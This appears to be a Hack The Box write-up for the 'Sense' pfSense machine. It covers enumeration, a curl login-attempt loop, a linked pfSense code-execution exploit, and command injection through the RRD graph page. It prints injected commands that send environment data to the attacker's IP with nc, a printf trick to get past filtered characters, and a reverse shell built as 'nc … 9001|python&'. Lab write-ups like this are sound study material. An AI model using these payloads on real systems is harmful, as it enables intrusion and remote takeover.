search
Total OSCP GuidePayloads All The Things

Sense Htb

hashtag
Enumeration

PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_http-title: Login
|_ssl-date: TLS randomness does not represent time

We find a webpage: Now copying as curl command from burpsuite after intercepting a test login:

for i in $(seq 0 15); do
curl -i -s -k -X $'POST' \
    -H $'Host: 10.10.10.60' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: https://10.10.10.60/' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 118' -H $'Origin: https://10.10.10.60' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' -H $'Te: trailers' -H $'Connection: close' \
    -b $'PHPSESSID=cc5f3189111a786c96a6f2f22db09759; cookie_test=1709355824' \
    --data-binary $'__csrf_magic=sid%3A0412e6b2e8e561be33172f221b0a66e1529b036f%2C1709352224&usernamefld=test&passwordfld=test&login=Login' \
    $'https://10.10.10.60/index.php'
echo $i
done

The box bans us after 15 attempts

hashtag
Method 1

Using exploit from github https://github.com/lawrencevanlaere/pfsense-code-exec/blob/master/pfsense_exec.py python3 pfsense_exec.py nc

hashtag
Method 2

Following the third method here https://www.proteansec.com/linux/pfsense-vulnerabilities-part-2-command-injection/

Opening the rrd graph: Following the instructions and doing the following in burpsuite:

And listening on nc -lnvp 1234 as there is no standard output

Now checking badchars with: echo+abc/|nc+10.10.14.24+1234 Now we get no output So / is a badchar. Checking env with env|nc+10.10.14.24+1234 We find that HOME is / so we can use backslash from there Now can read user.txt and root.txt

For shell though we know that - and / are bad characters so using printf command: To get -: x=$(printf+"\55");echo+$x|nc+10.10.14.24+1234

Now to get a reverse shell: cmd as:

Now setting nc so that it sends the file cmd: nc -lnvp 9001 < cmd Then on burpsuite nc 10.10.14.24 9001|python& Now we get a shell:

hashtag
BruteForce

First getting a post request in burpsuite: Now copying the required part. We need the csrfmagicktoken from the website so using ctrl+U Now writing a python script to bruteforce the password:

Can use burpsuite proxy to intercept the request too.

PreviousPandora HTBNextSoccer HTB

Last updated